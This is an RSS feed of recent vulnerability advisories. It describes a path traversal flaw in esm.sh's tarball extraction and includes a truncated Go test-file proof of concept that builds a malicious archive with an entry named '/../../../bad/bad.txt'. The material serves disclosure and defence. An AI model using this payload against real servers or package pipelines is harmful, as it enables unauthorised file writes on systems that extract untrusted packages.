<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Tue, 06 Oct 2026 02:02:55 +0000</lastBuildDate>
    <item>
      <title>EUVD-2026-266127</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-266127</link>
      <description>EUVD-2026-266127</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-266127</guid>
    </item>
    <item>
      <title>fkie_cve-2026-23644</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-23644</link>
      <description>&lt;p&gt;esm.sh is a no-build content delivery network (CDN) for web development. Prior to Go pseeudoversion 0.0.0-20260116051925-c62ab83c589e, the software has a path traversal vulnerability due to an incomplete fix. `path.Clean` normalizes a path but does not prevent absolute paths in a malicious tar file. Commit https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16, corresponding to pseudoversion 0.0.0-20260116051925-c62ab83c589e, fixes this issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;esm.sh is a no-build content delivery network (CDN) for web development. Prior to Go pseeudoversion 0.0.0-20260116051925-c62ab83c589e, the software has a path traversal vulnerability due to an incomplete fix. `path.Clean` normalizes a path but does not prevent absolute paths in a malicious tar file. Commit https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16, corresponding to pseudoversion 0.0.0-20260116051925-c62ab83c589e, fixes this issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-23644</guid>
    </item>
    <item>
      <title>GHSA-2657-3c98-63jq — esm.sh has a path traversal in extractPackageTarball enables file writes from malicious packages</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-2657-3c98-63jq</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/esm-dev/esm.sh&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;The [commit](https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16) does not actually fix the path traversal bug. `path.Clean` basically normalizes a path but does not prevent absolute paths in a malicious tar file.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;This test file can demonstrate the basic idea pretty easily:&lt;/p&gt;
&lt;p&gt;```go
package server&lt;/p&gt;
&lt;p&gt;import (
	&amp;#34;archive/tar&amp;#34;
	&amp;#34;bytes&amp;#34;
	&amp;#34;compress/gzip&amp;#34;
	&amp;#34;testing&amp;#34;
)&lt;/p&gt;
&lt;p&gt;// TestExtractPackageTarball_PathTraversal tests the extractPackageTarball function
// with a malicious tarball containing a path traversal attempt
func TestExtractPackageTarball_PathTraversal(t *testing.T) {
	// Create a temporary directory for testing
	installDir := &amp;#34;./testdata/good&amp;#34;&lt;/p&gt;
&lt;p&gt;// Create a malicious tarball with path traversal
	var buf bytes.Buffer
	gw := gzip.NewWriter(&amp;amp;buf)
	tw := tar.NewWriter(gw)&lt;/p&gt;
&lt;p&gt;// Add a normal file
	content := []byte(&amp;#34;export const foo = &amp;#39;bar&amp;#39;;&amp;#34;)
	header := &amp;amp;tar.Header{
		Name:     &amp;#34;package/index.js&amp;#34;,
		Mode:     0644,
		Size:     int64(len(content)),
		Typeflag: tar.TypeReg,
	}
	if err := tw.WriteHeader(header); err != nil {
		t.Fatal(err)
	}
	if _, err := tw.Write(content); err != nil {
		t.Fatal(err)
	}&lt;/p&gt;
&lt;p&gt;// Add a malicious file with path traversal
	bad := []byte(&amp;#34;bad&amp;#34;)
	header = &amp;amp;tar.Header{
		Name:     &amp;#34;/../../../bad/bad.txt&amp;#34;,
		Mode:     0644,
		Size:     int64(len(bad)),
		Typeflag: tar.TypeReg,
	}
	if err := tw.WriteHeader(header); err != nil {
		t.Fatal(err)
	}
	if _, err := tw.Write(bad); err != nil {
		t.Fatal(err)
	}&lt;/p&gt;
&lt;p&gt;tw.…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Go: github.com/esm-dev/esm.sh&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;The [commit](https://github.com/esm-dev/esm.sh/commit/9d77b88c320733ff6689d938d85d246a3af9af16) does not actually fix the path traversal bug. `path.Clean` basically normalizes a path but does not prevent absolute paths in a malicious tar file.&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;This test file can demonstrate the basic idea pretty easily:&lt;/p&gt;
&lt;p&gt;```go
package server&lt;/p&gt;
&lt;p&gt;import (
	&amp;#34;archive/tar&amp;#34;
	&amp;#34;bytes&amp;#34;
	&amp;#34;compress/gzip&amp;#34;
	&amp;#34;testing&amp;#34;
)&lt;/p&gt;
&lt;p&gt;// TestExtractPackageTarball_PathTraversal tests the extractPackageTarball function
// with a malicious tarball containing a path traversal attempt
func TestExtractPackageTarball_PathTraversal(t *testing.T) {
	// Create a temporary directory for testing
	installDir := &amp;#34;./testdata/good&amp;#34;&lt;/p&gt;
&lt;p&gt;// Create a malicious tarball with path traversal
	var buf bytes.Buffer
	gw := gzip.NewWriter(&amp;amp;buf)
	tw := tar.NewWriter(gw)&lt;/p&gt;
&lt;p&gt;// Add a normal file
	content := []byte(&amp;#34;export const foo = &amp;#39;bar&amp;#39;;&amp;#34;)
	header := &amp;amp;tar.Header{
		Name:     &amp;#34;package/index.js&amp;#34;,
		Mode:     0644,
		Size:     int64(len(content)),
		Typeflag: tar.TypeReg,
	}
	if err := tw.WriteHeader(header); err != nil {
		t.Fatal(err)
	}
	if _, err := tw.Write(content); err != nil {
		t.Fatal(err)
	}&lt;/p&gt;
&lt;p&gt;// Add a malicious file with path traversal
	bad := []byte(&amp;#34;bad&amp;#34;)
	header = &amp;amp;tar.Header{
		Name:     &amp;#34;/../../../bad/bad.txt&amp;#34;,
		Mode:     0644,
		Size:     int64(len(bad)),
		Typeflag: tar.TypeReg,
	}
	if err := tw.WriteHeader(header); err != nil {
		t.Fatal(err)
	}
	if _, err := tw.Write(bad); err != nil {
		t.Fatal(err)
	}&lt;/p&gt;
&lt;p&gt;tw.…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-2657-3c98-63jq</guid>
    </item>
  </channel>
</rss>
